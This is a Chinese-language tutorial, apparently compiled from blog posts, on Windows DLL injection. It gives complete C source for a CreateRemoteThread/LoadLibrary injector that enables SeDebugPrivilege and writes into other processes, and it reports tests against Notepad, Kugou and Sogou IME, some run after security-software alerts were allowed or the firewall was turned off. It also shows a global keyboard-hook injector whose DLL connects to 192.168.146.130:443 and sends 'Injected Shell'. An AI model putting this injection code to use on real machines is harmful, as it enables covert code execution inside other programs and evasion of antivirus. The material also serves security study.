得到系統(tǒng)快照句柄后，我們調(diào)用Process32First和Process32Next來(lái)依次獲取系統(tǒng)中每個(gè)進(jìn)程的信息，將信息存入PROCESSENTRY32結(jié)構(gòu)體中，該結(jié)構(gòu)體中存放著進(jìn)程的主要信息，如
DWORD ?th32ProcessID; ?//進(jìn)程ID
DWORD ?th32ModuleID; ?//進(jìn)程模塊ID
CHAR ? szExeFile[MAX_PATH]; ?//進(jìn)程的可執(zhí)行文件名
這兩個(gè)函數(shù)當(dāng)枚舉到進(jìn)程時(shí)返回TRUE，否則返回FALSE。
然后調(diào)用一次 Process32First 函數(shù)，從快照中獲取第一個(gè)進(jìn)程，然后重復(fù)調(diào)用 Process32Next，直到函數(shù)返回 FALSE 為止，這樣將遍歷快照中進(jìn)程列表。這兩個(gè)函數(shù)都帶兩個(gè)參數(shù)，它們分別是快照句柄和一個(gè) PROCESSENTRY32 結(jié)構(gòu)。調(diào)用完 Process32First 或 Process32Next 之后，PROCESSENTRY32 中將包含系統(tǒng)中某個(gè)進(jìn)程的關(guān)鍵信息。其中進(jìn)程 ID 就存儲(chǔ)在此結(jié)構(gòu)的 th32ProcessID。此 ID 傳給 OpenProcess API 可以獲得該進(jìn)程的句柄。對(duì)應(yīng)的可執(zhí)行文件名及其存放路徑存放在 szExeFile 結(jié)構(gòu)成員中。在該結(jié)構(gòu)中還可以找到其它一些有用的信息。
需要注意的是：在調(diào)用 Process32First() 之前，要將 PROCESSENTRY32 結(jié)構(gòu)的 dwSize 成員設(shè)置成 sizeof(PROCESSENTRY32)。 然后再用 Process32First、Process32Next 來(lái)枚舉進(jìn)程。使用結(jié)束后要調(diào)用 CloseHandle 來(lái)釋放保存的系統(tǒng)快照。具體程序代碼如下：
//利用ToolHelp32庫(kù)來(lái)枚舉當(dāng)前系統(tǒng)進(jìn)程
#include
#include
#include
#include
?
int ListProcess()
{
? ? //獲取系統(tǒng)快照
? ? HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //不要寫(xiě)錯(cuò)CreateToolhelp32Snapshot()
? ? if (hProcessSnap == INVALID_HANDLE_VALUE)
? ? {
? ? ? ?printf("CreateToolHelp32Snapshot error!\n");
? ? ? ?return -1;
? ? }
?
? ? //創(chuàng)建單個(gè)進(jìn)程快照結(jié)構(gòu)體，初始化大小
? ? PROCESSENTRY32 pe32;
? ? pe32.dwSize = sizeof(PROCESSENTRY32); ?//務(wù)必提前初始化，否則默認(rèn)的大小不一定滿足要求
?
? ? //初始化緩沖區(qū)
? ? WCHAR buff[1024] = {0}; //PROCESSENTRY32中的szExeFile為WCHAR類型數(shù)組，此處應(yīng)一致，使用Unicode碼
?
? ? //枚舉系統(tǒng)快照鏈表中的第一個(gè)進(jìn)程項(xiàng)目
? ? BOOL bProcess = Process32First(hProcessSnap, &pe32);
? ? while (bProcess)
? ? {
?
? ? ? ?//格式化進(jìn)程名和進(jìn)程ID，這里要使用printf的寬字符版
? ? ? ?//格式字符串“”都需要用L轉(zhuǎn)換為寬字符形式
? ? ? ?wsprintf(buff, L"FileName:%-30sID:%-6d\r\n", pe32.szExeFile, pe32.th32ProcessID);
? ? ? ?wprintf(L"%s\n",buff);
? ? ? ?//緩沖區(qū)復(fù)位
? ? ? ?memset(buff, 0, sizeof(buff));
? ? ? ?//繼續(xù)枚舉下一個(gè)進(jìn)程
? ? ? ?bProcess = Process32Next(hProcessSnap, &pe32);
? ? }
?
? ? CloseHandle(hProcessSnap);
? ? return 0;
}
l ?EnableDebugPriv()
提升權(quán)限主要利用下面四個(gè)函數(shù)：
GetCurrentProcessID() ? ? ? ?//得到當(dāng)前進(jìn)程的ID ?
OpenProcessToken() ? ? ? ? ?//得到進(jìn)程的令牌句柄
LookupPrivilegeValue() ? ? ? //查詢進(jìn)程的權(quán)限
AdjustTokenPrivileges() ? ? ? ?//調(diào)整令牌權(quán)限?
進(jìn)程的權(quán)限設(shè)置存儲(chǔ)在令牌句柄中，我們需要先獲取進(jìn)程的令牌句柄，其次獲取進(jìn)程中權(quán)限類型的LUID值，利用此值來(lái)設(shè)置進(jìn)程新的權(quán)限，具體函數(shù)調(diào)用順序如下：
OpenProcessToken()---->LookupPrivilegeValue()---->AdjustTokenPrivileges()
具體代碼如下：
#include
#include
?
int EnableDebugPriv(const WCHAR *name)
{
? ? HANDLE hToken; ? //進(jìn)程令牌句柄
? ? TOKEN_PRIVILEGES tp; ?//TOKEN_PRIVILEGES結(jié)構(gòu)體，其中包含一個(gè)【類型+操作】的權(quán)限數(shù)組
? ? LUID luid; ? ? ? //上述結(jié)構(gòu)體中的類型值
?
? ? //打開(kāi)進(jìn)程令牌環(huán)
? ? //GetCurrentProcess()獲取當(dāng)前進(jìn)程的偽句柄，只會(huì)指向當(dāng)前進(jìn)程或者線程句柄，隨時(shí)變化
? ? if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
? ? {
? ? ? ?printf("OpenProcessToken error\n");
? ? ? ?return -8;
? ? }
?
? ? //獲得本地進(jìn)程name所代表的權(quán)限類型的局部唯一ID
? ? if (!LookupPrivilegeValue(NULL, name, &luid))
? ? {
? ? ? ?printf("LookupPrivilegeValue error\n");
? ? }
?
? ? tp.PrivilegeCount = 1; ? ?//權(quán)限數(shù)組中只有一個(gè)“元素”
? ? tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; ?//權(quán)限操作
? ? tp.Privileges[0].Luid = luid; ? //權(quán)限類型
?
? ? //調(diào)整進(jìn)程權(quán)限
? ? if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
? ? {
? ? ? ?printf("AdjustTokenPrivileges error!\n");
? ? ? ?return -9;
? ? }
?
? ? return 0;
}
?
三、獲取LoadLibrary()的遠(yuǎn)程地址
對(duì)于Windows系統(tǒng)而言，本地進(jìn)程和遠(yuǎn)程進(jìn)程中的Kernel32.dll被映射到地址空間的同一內(nèi)存地址，因而只要獲取本地進(jìn)程中LoadLibrary()的地址，在遠(yuǎn)程進(jìn)程中也同樣是這個(gè)地址，可以直接傳給CreateRemoteThread()：
LPTHREAD_START_ROUTINE pLoadLibrary
=
(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA");
GetProcAddress函數(shù)檢索指定的動(dòng)態(tài)鏈接庫(kù)(DLL)中的輸出庫(kù)函數(shù)地址。
函數(shù)原型：
　　FARPROC GetProcAddress(
　　HMODULE hModule, // DLL模塊句柄
　　LPCSTR lpProcName // 函數(shù)名，以NULL結(jié)尾的字符串
);
返回值：
　　如果函數(shù)調(diào)用成功，返回值是DLL中的輸出函數(shù)地址。
　　如果函數(shù)調(diào)用失敗，返回值是NULL。得到進(jìn)一步的錯(cuò)誤信息，調(diào)用函數(shù)GetLastError。
?
四、向遠(yuǎn)程進(jìn)程中寫(xiě)入DLL路徑字符串
l ?VirtualAllocEx()
如果直接向CreateRemoteThread()傳入DLL路徑，如”C:\\Windows\\System32\\MyDLL.dll”那么實(shí)際向遠(yuǎn)程線程傳遞的是一個(gè)本地的指針值，這個(gè)值在遠(yuǎn)程進(jìn)程的地址空間中是沒(méi)有意義的。所以我們需要使用VirtualAllocEx()函數(shù)在遠(yuǎn)程進(jìn)程中先分配一段空間，用于直接寫(xiě)入我們的DLL路徑。
函數(shù)原形：
　　LPVOID VirtualAllocEx(
　　HANDLE hProcess,
　　LPVOID lpAddress,
　　SIZE_T dwSize,
　　DWORD flAllocationType,
　　DWORD flProtect
　　);
　　hProcess：
　　申請(qǐng)內(nèi)存所在的進(jìn)程句柄。
　　lpAddress：
　　保留頁(yè)面的內(nèi)存地址；一般用NULL自動(dòng)分配 。
　　dwSize：
欲分配的內(nèi)存大小，字節(jié)單位；注意實(shí)際分 配的內(nèi)存大小是頁(yè)內(nèi)存大小的整數(shù)倍。
我們這里的實(shí)際代碼為：
//在遠(yuǎn)程進(jìn)程中分配內(nèi)存，準(zhǔn)備拷入DLL路徑字符串
//取得當(dāng)前DLL路徑
char DllPath[260]; //Windows路徑最大為
GetCurrentDirectoryA(260, DllPath); ?//獲取當(dāng)前進(jìn)程執(zhí)行目錄
printf("Proces***e Directory is %s\n", DllPath);?
strcat(DllPath, "\\..\\Debug\\MyDLL.dll"); //鏈接到DLL路徑
LPVOID pRemoteDllPath = VirtualAllocEx(hRemoteProcess, NULL, strlen(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
if (pRemoteDllPath == NULL)
{
? ? printf("VirtualAllocEx error\n");
? ? return -3;
}
l ?WriteProcessMemory()
我們利用該函數(shù)直接向遠(yuǎn)程進(jìn)程中分配好的空間中寫(xiě)入DLL路徑字符串
BOOL WriteProcessMemory(
? ? HANDLE hProcess, ? ? ?// 進(jìn)程的句柄，是用OpenProcess打開(kāi)的
? ? LPVOID lpBaseAddress, // 要寫(xiě)入的起始地址
? ? LPVOID lpBuffer, ? ? ?// 寫(xiě)入的緩存區(qū)
? ? DWORD nSize, // 要寫(xiě)入緩存區(qū)的大小
? ? LPDWORD lpNumberOfBytesWritten ? ? ? ? ?// 這個(gè)是返回實(shí)際寫(xiě)入的字節(jié)。
? ?);
我們這里的實(shí)際代碼為：
//向遠(yuǎn)程進(jìn)程空間中寫(xiě)入DLL路徑字符串
printf("DllPath is %s\n", DllPath);
DWORD Size;
if (WriteProcessMemory(hRemoteProcess, pRemoteDllPath, DllPath, strlen(DllPath) +1, &Size) == NULL)
? ? {
? ? ? ?printf("WriteProcessMemory error\n");
? ? ? ?return -4;
? ? }
printf("WriteRrmoyrProcess Size is %d\n\n", Size);
?
五、程序源碼
F ?DLL源碼：
#include
#include
#include
?
BOOL APIENTRY DllMain(HINSTANCE hInstDll, DWORD fdwReason, PVOID fImpLoad)
{
? ? switch (fdwReason)
? ? {
? ? ? ?case DLL_PROCESS_ATTACH :
? ? {
? ? ? ?//The DLL is being mapped into the process's address space.
? ? ? ?//DWORD ThreadId;
? ? ? ?//CreateThread(NULL, NULL, MessageThread, NULL, NULL, &ThreadId);
? ? ? ?MessageBox(NULL, L"DLL has been mapped!", L"1st RemoteThread", MB_OK);
? ? ? ?//打開(kāi)文件，定義文件指針，指定打開(kāi)方式為寫(xiě)+追加
? ? ? ?FILE *fp = fopen("C:\\test.txt", "w"); ? ? //打開(kāi)方式參數(shù)為字符串
? ? ? ?//文件讀寫(xiě)函數(shù)：
? ? ? ?//讀寫(xiě)字符：getc(), putc(); 讀寫(xiě)字符串：fgets(), fputs()
? ? ? ?//向標(biāo)準(zhǔn)輸入輸出讀入寫(xiě)出：
? ? ? ?//getchar(), putchar(); ?gets(0, puts(0;
? ? ? ? fputs("一個(gè)DLL測(cè)試文本\n", fp);
? ? ? ? //printf("Test finished\n");
? ? ? ?//關(guān)閉文件指針，釋放內(nèi)存
? ? ? ? fclose(fp);
? ? } ? ? ?
? ? ? ?case DLL_THREAD_ATTACH:
? ? ? ?//A Thread is being created.
? ? ? ?MessageBox(NULL, L"RemoteThread has been created!", L"2nd RemoteThread", MB_OK);
? ? ? ?break;
? ? ? ?case DLL_THREAD_DETACH:
? ? ? ?//A Thtread is exiting cleanly.
? ? ? ?MessageBox(NULL, L"RemoteThread exit!", L"13rd RemoteThread", MB_OK);
? ? ? ?break;
? ? ? ?case DLL_PROCESS_DETACH:
? ? ? ?//The DLL is being ummapped from the process' address space
? ? ? ?MessageBox(NULL, L"DLL has been unmapped!", L"4th RemoteThread", MB_OK);
? ? ? ?break;
? ? }
? ? return TRUE; ?//Used only for DLL_PROCESS_ATTACH
}
??
F ?RemoteInjectExe.cpp
#include
#include
#include
#include
#include
?
extern int ListProcess();
extern int EnableDebugPriv(const WCHAR *);
?
int _tmain(int argc, TCHAR *argv[], TCHAR *env[])
{
? ? //為了成功使用CreateRemoteThread()函數(shù)，必須：
? ? //1.利用OpenProcess()獲得遠(yuǎn)程進(jìn)程的句柄
? ? //2.利用VirtualAllocEx(),WriteProcessMemory()寫(xiě)入DLL路徑字符串
? ? //3.獲得遠(yuǎn)程進(jìn)程中LoadLibrary()的確切地址
?
? ? //輸入進(jìn)程ID獲得進(jìn)程句柄
? ? char YesNo;
? ? printf("是否查看當(dāng)前進(jìn)程列表獲得進(jìn)程ID: Y or N?");
? ? scanf("%c", &YesNo);
? ? Sleep(250);
? ? if (YesNo == 'Y' || YesNo == 'y')
? ? ? ?ListProcess();
? ? printf("請(qǐng)輸入要注入的進(jìn)程ID【‘’表示自身進(jìn)程】：\n");
? ? DWORD dwRemoteProcessId;
? ? scanf("%d",&dwRemoteProcessId);
? ? //如果輸入“”表示向自身進(jìn)程注入
? ? if (dwRemoteProcessId == 0)
? ? ? ?dwRemoteProcessId = GetCurrentProcessId();
?
? ? //獲得調(diào)試權(quán)限
? ? if (EnableDebugPriv(SE_DEBUG_NAME))
? ? {
? ? ? ?printf("Add Privilege error\n");
? ? ? ?return -1;
? ? }
? ? //調(diào)用OpenProcess()獲得句柄
? ? HANDLE hRemoteProcess;
? ? if ((hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId)) == NULL)
? ? {
? ? ? ?printf("OpenProcess error\n");
? ? ? ?printf("Error Code:%d\n",GetLastError());
? ? ? ?system("pause");
? ? ? ?return -2;
? ? }
?
? ? //在遠(yuǎn)程進(jìn)程中分配內(nèi)存，準(zhǔn)備拷入DLL路徑字符串
? ? //取得當(dāng)前DLL路徑
? ? char DllPath[260]; //Windows路徑最大為
? ? GetCurrentDirectoryA(260, DllPath); ?//獲取當(dāng)前進(jìn)程執(zhí)行目錄
? ? printf("Proces***e Directory is %s\n", DllPath);?
? ? strcat(DllPath, "\\..\\Debug\\MyDLL.dll"); //鏈接到DLL路徑
? ? LPVOID pRemoteDllPath = VirtualAllocEx(hRemoteProcess, NULL, strlen(DllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
? ? if (pRemoteDllPath == NULL)
? ? {
? ? ? ?printf("VirtualAllocEx error\n");
? ? ? ?return -3;
? ? }
?
? ? //向遠(yuǎn)程進(jìn)程空間中寫(xiě)入DLL路徑字符串
? ? printf("DllPath is %s\n", DllPath);
? ? DWORD Size;
? ? if (WriteProcessMemory(hRemoteProcess, pRemoteDllPath, DllPath, strlen(DllPath) +1, &Size) == NULL)
? ? {
? ? ? ?printf("WriteProcessMemory error\n");
? ? ? ?return -4;
? ? }
? ? printf("WriteRrmoyrProcess Size is %d\n\n", Size);
?
? ? //獲得遠(yuǎn)程進(jìn)程中LoadLibrary()的地址
? ? LPTHREAD_START_ROUTINE pLoadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA");
? ? if (pLoadLibrary == NULL)
? ? {
? ? ? ?printf("GetProcAddress error\n");
? ? ? ?return -5;
? ? }
? ? else
? ? {
? ? ? ?printf("LoadLibrary's Address is 0x%x\n\n", pLoadLibrary);
? ? }
?
? ? //啟動(dòng)遠(yuǎn)程線程
? ? DWORD dwThreadId;
? ? HANDLE hThread;
? ? if ((hThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pLoadLibrary, pRemoteDllPath, 0, &dwThreadId)) == NULL)
? ? {
? ? ? ?printf("CreateRemoteThread error\n");
? ? ? ?return -6;
? ? }
? ? else
? ? {
? ? WaitForSingleObject(hThread, INFINITE);
? ? printf("dwThreadId is %d\n\n", dwThreadId);
? ? printf("Inject is done\n");
? ? }
?
? ? //釋放分配內(nèi)存
? ? if (VirtualFreeEx(hRemoteProcess, pRemoteDllPath, 0, MEM_RELEASE) == 0)
? ? {
? ? ? ?printf("VitualFreeEx error\n");
? ? ? ?return -8;
? ? }
?
? ? //釋放句柄
? ? if (hThread != NULL) CloseHandle(hThread);
? ? if (hRemoteProcess != NULL) CloseHandle(hRemoteProcess);
?
? ? system("pause");
? ? return 0;
}
?
六、運(yùn)行測(cè)試
１.向記事本進(jìn)程注入DLL


這里輸出了一些數(shù)據(jù)作為調(diào)試時(shí)查看的參考，可以看到寫(xiě)入的DLL路徑
這是DLL加載進(jìn)遠(yuǎn)程進(jìn)程地址空間時(shí)的DLL_PROCESS_ATTACH提示
這是遠(yuǎn)程線程創(chuàng)建時(shí)的DLL_THREAD_ATTACH提示
這是遠(yuǎn)程線程退出時(shí)DLL_THREAD_DETACH提示
查看此時(shí)記事本進(jìn)程中的ＤＬＬ模塊
此時(shí)沒(méi)有彈出DLL_PROCESS_DETACH提示，因?yàn)槲覀兊腄LL還存在于記事本進(jìn)程中，關(guān)閉記事本
２.向自身進(jìn)程注入
在實(shí)際編寫(xiě)時(shí)，常常會(huì)出現(xiàn)各種各樣的問(wèn)題而弄不清原因在本地進(jìn)程還是遠(yuǎn)程進(jìn)程。因而我們?cè)O(shè)定當(dāng)輸入的進(jìn)程ＩＤ為０時(shí)，向自身進(jìn)程注入ＤＬＬ
然而當(dāng)最后結(jié)束的時(shí)候卻會(huì)出現(xiàn)錯(cuò)誤：


在網(wǎng)上查詢可以知道這種錯(cuò)誤常常是由于殺毒軟件或者防火墻造成的，關(guān)閉360木馬防火墻后運(yùn)行正常：
3.向其他進(jìn)程注入
l ?向Kugoo7.exe注入會(huì)彈出360提示，允許后注入成功，之后正常退出，Kugoo7正常運(yùn)行


有意思的發(fā)現(xiàn)是，由于我們沒(méi)有卸載Kugou7中的注入的DLL，因而在Kugou7播放的過(guò)程中時(shí)不時(shí)彈出創(chuàng)建線程的消息框提示，可見(jiàn)Kugou7本身在播放音樂(lè)的過(guò)程中也在不斷創(chuàng)建、釋放線程。
?
l ?向搜狗輸入法注入，依然是360彈出提示，允許后成功


仔細(xì)觀察發(fā)現(xiàn)上面360彈出警告的程序點(diǎn)都在源碼調(diào)用CreateRemoteThread()的時(shí)間點(diǎn)，可見(jiàn)360對(duì)該API進(jìn)行了檢測(cè)。
?
l ?當(dāng)向進(jìn)程查看工具IceSword1.22注入時(shí)，在調(diào)用OpenProcess()時(shí)失敗，提示內(nèi)存分配訪問(wèn)無(wú)效，估計(jì)是設(shè)定了更高的訪問(wèn)權(quán)限，使得Ring3級(jí)別的訪問(wèn)基本都無(wú)效
========

DLL注入的幾種姿勢(shì)（一）：Windows Hooks?

http://www.freebuf.com/articles/system/93413.html


DLL注入的目的是將代碼放進(jìn)另一個(gè)進(jìn)程的地址空間中，所以要怎樣才能實(shí)現(xiàn)DLL注入呢？


其實(shí)在Windows中有好幾種方法可以實(shí)現(xiàn)，這里我們首先嘗試通過(guò)“SetWindowsHookEx”創(chuàng)建鉤子（hooks）來(lái)實(shí)現(xiàn)。另外如果你對(duì)這方面很感興趣，可以參考文章最底下的相關(guān)文獻(xiàn)，這些文獻(xiàn)包含大量的代碼以及其他有用的信息。


Windows Hooks


首先我們需要理解Windows的hook機(jī)制和API函數(shù)SetWindowsHookEx。Hook 機(jī)制允許應(yīng)用程序截獲處理窗口消息或特定事件。而鉤子又可以分為多種，例如WH_KEYBOARD和WH_MOUSE，這兩種鉤子可以分別用來(lái)監(jiān)視鍵盤(pán)和鼠標(biāo)的消息。同樣也存在這些鉤子的低版本。要想理解Hook機(jī)制，必須要清楚的是每一個(gè)Hook事件的發(fā)生都有一個(gè)與之相關(guān)聯(lián)的指針列表，稱之為Hook鏈表。這個(gè)鏈表存在一系列的子進(jìn)程，并且伴隨著事件而執(zhí)行。


下面是Hook子程的語(yǔ)法，來(lái)源MSDN：


圖片1.png


使用SetWindowsHookEx實(shí)現(xiàn)DLL注入


使用API函數(shù)SetWindowsHookEx()把一個(gè)應(yīng)用程序定義的Hook子程安裝到 Hook鏈表中。這是該函數(shù)的語(yǔ)法，來(lái)源MSDN：


圖片2.png


idHook是Hook的類型，lpfn是Hook子程的地址指針，hMod是應(yīng)用程序?qū)嵗木浔?#xff0c;最后dwThreadId標(biāo)識(shí)當(dāng)前進(jìn)程創(chuàng)建的線程。為了要讓lpfn指向子程，首先通過(guò)LoadLibrary函數(shù)加載DLL文件至exe文件的地址空間中。然后通過(guò)GetProcessAddress獲得所需函數(shù)的地址。最后調(diào)用SetWindowsHookEx，等待我們?cè)O(shè)置好的事件發(fā)生或者創(chuàng)建一個(gè)類似BroadcastSystemMessage的消息服務(wù)。一旦事件發(fā)生，Windows將會(huì)加載DLL至目標(biāo)進(jìn)程的地址空間中。


代碼


下面的代碼來(lái)源這里，首先通過(guò)LoadLibrary函數(shù)將DLL加載至可執(zhí)行程序中。調(diào)用GetProcessAddress函數(shù)從DLL中獲取注入地址。最后設(shè)置一個(gè)全局鉤子（參數(shù)設(shè)置為0表示監(jiān)視全局線程），監(jiān)視程序。


injector.c


#include <windows.h>


int main(int argc, char* argv)
{
? ? /*
? ? Loads inject.dll into the address space of the calling function, in this case the running exe
? ? */
? ? HMODULE dll = LoadLibrary("inject.dll");
? ? if(dll == NULL)
? ? {
? ? ? ? printf("Cannot find DLL");
? ? ? ? getchar();
? ? ? ? return -1;
? ? }


? ? /*
? ? Gets the address of the inject method in the inject.dll
? ? */
? ? HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "inject");
? ? if(addr == NULL)
? ? {
? ? ? ? printf("Cannot find the function");
? ? ? ? getchar();
? ? ? ? return -1;
? ? }


? ? /*
? ? Places a hook in the hookchain for WH_KEYBOARD type events, using the address for the inject method, with the library address
? ? */
? ? HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, 0);
? ? if(handle == NULL)
? ? {
? ? ? ? printf("Couldn't hook the keyboard");
? ? }


? ? printf("Hooked the program, hit enter to exit");
? ? getchar();
? ? UnhookWindowsHookEx(handle);


? ? return 0;
}
injectShell.c


#include <stdio.h>
#include <winsock2.h>
#include <windows.h>


INT APIENTRY DllMain(HMODULE hDll, DWORD Reason, LPVOID Reserved)
{
? ? FILE *file;
? ? fopen_s(&file, "C:\temp.txt", "a+");


? ? switch(Reason)
? ? {
? ? ? ? case DLL_PROCESS_ATTACH:
? ? ? ? ? ? fprintf(file, "DLL attach function called.n");
? ? ? ? ? ? break;
? ? ? ? case DLL_PROCESS_DETACH:
? ? ? ? ? ? fprintf(file, "DLL detach function called.n");
? ? ? ? ? ? break;
? ? ? ? case DLL_THREAD_ATTACH:
? ? ? ? ? ? fprintf(file, "DLL thread attach function called.n");
? ? ? ? ? ? break;
? ? ? ? case DLL_THREAD_DETACH:
? ? ? ? ? ? fprintf(file, "DLL thread detach function called.n");
? ? ? ? ? ? break;
? ? }


? ? fclose(file);


? ? return TRUE;
}
int inject(int code, WPARAM wParam, LPARAM lParam)
{


? ? WSADATA wsa;
? ? SOCKET s;
? ? struct sockaddr_in server;
? ? char *message;


? ? printf("\nInitializing Winsock...");
? ? if(WSAStartup(MAKEWORD(2,2),&wsa) != 0)
? ? {
? ? ? ? printf("Failed. Error Code : %d", WSAGetLastError());
? ? ? ? return(CallNextHookEx(NULL, code, wParam, lParam));
? ? }


? ? printf("Initialized. \n");


? ? if((s = socket(AF_INET, SOCK_STREAM, 0 )) == INVALID_SOCKET)
? ? {
? ? ? ? printf("Could not create socket : %d", WSAGetLastError());
? ? }


? ? printf("Socket Created. \n");


? ? server.sin_addr.s_addr = inet_addr("192.168.146.130"); //ip address
? ? server.sin_family = AF_INET;
? ? server.sin_port = htons( 443 );


? ? if(connect(s, (struct sockaddr *)&server, sizeof(server)) < 0)
? ? {
? ? ? ? puts("connect error");
? ? ? ? return(CallNextHookEx(NULL, code, wParam, lParam));
? ? }


? ? puts("Connected");


? ? message = "Injected Shell";
? ? if( send(s, message, strlen(message), 0) <0)
? ? {
? ? ? ? puts("Send failed");
? ? ? ? return(CallNextHookEx(NULL, code, wParam, lParam));
? ? }
? ? puts("Data sent\n");


? ? return(CallNextHookEx(NULL, code, wParam, lParam));


}
這里我們可以看到，該DLL文件連接其他主機(jī)。


圖片3.png


接下來(lái)，DLL加載至另一個(gè)不同的進(jìn)程中，成功！


圖片4.png


盡管這段代碼還存在問(wèn)題，但我們?cè)O(shè)置的全局鉤子意味著可以監(jiān)視任何按鍵信息。換句話說(shuō)我們最終可以注入一些預(yù)期之外的東西。幸運(yùn)的是，可以注入至一個(gè)特定的進(jìn)程中。還有另一個(gè)包含一些必要修改的版本。MSDN幫助我獲得了一些我所需要的東西。這段代碼向目標(biāo)注入中增加了一些額外的步驟。首先，獲得注入進(jìn)程的id。通過(guò)這個(gè)獲得這個(gè)進(jìn)程的線程id，而SetWindowsHookEx 函數(shù)中的最后的一個(gè)參數(shù)就是線程的id。接著開(kāi)始監(jiān)視我們的進(jìn)程，我們只需等待。


injector2.c


#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
#include <tlhelp32.h>


/*
This method is used to get a thread id for a process.?
It loops through all of the threads and compares their pid with the desired pid
*/
DWORD getThreadID(DWORD pid)
{
? ? puts("Getting Thread ID");
? ? HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
? ? if(h != INVALID_HANDLE_VALUE)
? ? {
? ? ? ? THREADENTRY32 te;
? ? ? ? te.dwSize = sizeof(te);
? ? ? ? if( Thread32First(h, &te))
? ? ? ? {
? ? ? ? ? ? do
? ? ? ? ? ? {
? ? ? ? ? ? ? ? if (te.dwSize >= FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(te.th32OwnerProcessID))
? ? ? ? ? ? ? ? {
? ? ? ? ? ? ? ? ? ? if(te.th32OwnerProcessID == pid)
? ? ? ? ? ? ? ? ? ? {
? ? ? ? ? ? ? ? ? ? ? ? HANDLE hThread = OpenThread(READ_CONTROL, FALSE, te.th32ThreadID);
? ? ? ? ? ? ? ? ? ? ? ? if(!hThread)
? ? ? ? ? ? ? ? ? ? ? ? {
? ? ? ? ? ? ? ? ? ? ? ? ? ? puts("Couldn't get thread handle");
? ? ? ? ? ? ? ? ? ? ? ? }
? ? ? ? ? ? ? ? ? ? ? ? else
? ? ? ? ? ? ? ? ? ? ? ? {
? ? ? ? ? ? ? ? ? ? ? ? ? ? //DWORD tpid = GetProcessIdOfThread(hThread);
? ? ? ? ? ? ? ? ? ? ? ? ? ? //printf("Got one: %u\n", tpid);
? ? ? ? ? ? ? ? ? ? ? ? ? ? return te.th32ThreadID;
? ? ? ? ? ? ? ? ? ? ? ? }
? ? ? ? ? ? ? ? ? ? }
? ? ? ? ? ? ? ? }
? ? ? ? ? ? } while( Thread32Next(h, &te));
? ? ? ? }
? ? }
? ? CloseHandle(h);
? ? return (DWORD)0;
}


/*
This method performs the actual injection. It gets an appropriate thread id, loads the dll,?
gets the address of the inject method, then calls SetWindowsHookEx.
*/
int processInject(int pid)
{
? ? DWORD processID = (DWORD)pid;


? ? ? ? TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");


? ? ? ? HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID);


? ? ? ? if (NULL != hProcess)
? ? ? ? {
? ? ? ? ? ? ? ? HMODULE hMod;
? ? ? ? ? ? ? ? DWORD cbNeeded;


? ? ? ? ? ? ? ? if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
? ? ? ? ? ? ? ? {
? ? ? ? ? ? ? ? ? ? ? ? GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName)/sizeof(TCHAR) );
? ? ? ? ? ? ? ? }
? ? ? ? }


? ? _tprintf( TEXT("Injecting into process %s PID: %u\n"), szProcessName, processID);


? ? DWORD threadID = getThreadID(processID);


? ? printf( "Using Thread ID %u\n", threadID);


? ? if(threadID == (DWORD)0)
? ? {
? ? ? ? puts("Cannot find thread");
? ? ? ? return -1;
? ? }


? ? HMODULE dll = LoadLibrary("inject2.dll");
? ? if(dll == NULL)
? ? {
? ? ? ? puts("Cannot find DLL");
? ? ? ? return -1;
? ? }


? ? HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "test");
? ? if(addr == NULL)
? ? {
? ? ? ? puts("Cannot find the function");
? ? ? ? return -1;
? ? }
? ? //Uses the threadID from getThreadID to inject into specific process
? ? HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, threadID);


? ? if(handle == NULL)
? ? {
? ? ? ? puts("Couldn't hook the keyboard");
? ? }
? ? getchar();
? ? getchar();
? ? getchar();
? ? UnhookWindowsHookEx(handle);
? ? return 0;
}


int main(int argc, char* argv)
{


? ? int pid;
? ? puts("Inject into which PID?");
? ? ? ? scanf ("%u",&pid);
? ? printf("PID entered: %u\n", pid);
? ? int result = processInject(pid);
? ? if(result == -1)
? ? {
? ? ? ? puts("Could not inject");
? ? }
? ? else
? ? {
? ? ? ? puts("Injected!");
? ? }
? ? getchar();
}
test1.c


#include <stdio.h>
#include <windows.h>
int test()
{
? ? char str[80];
? ? /*
? ? Get's the current process id to display in the message box
? ? */
? ? int id = GetCurrentProcessId();
? ? sprintf(str, "Hello, process: %d", id);
? ? MessageBox(NULL, str, "Hello DLL!", MB_OK);
? ? return 0;
}
圖片5.png


可以看到，這是從我們所選擇的進(jìn)程中運(yùn)行的消息框。通過(guò)Process Explorer可以看到DLL同時(shí)加載到Notepad++和injector程序中，這個(gè)正是由于程序本身就加載了DLL文件。


圖片6.png


盡管如此，監(jiān)視進(jìn)程還存在一定的局限性。一個(gè)進(jìn)程必須存在消息循環(huán)并且確保能夠接收消息，這樣才能被監(jiān)視到。這個(gè)主要限制了基于GUI的應(yīng)用程序的目標(biāo)。SetWindowsHookEx 同樣不能具有更高完整性的進(jìn)程中使用。


逆向代碼


下面是IDA逆向第一個(gè)injector的代碼。


圖片7.png


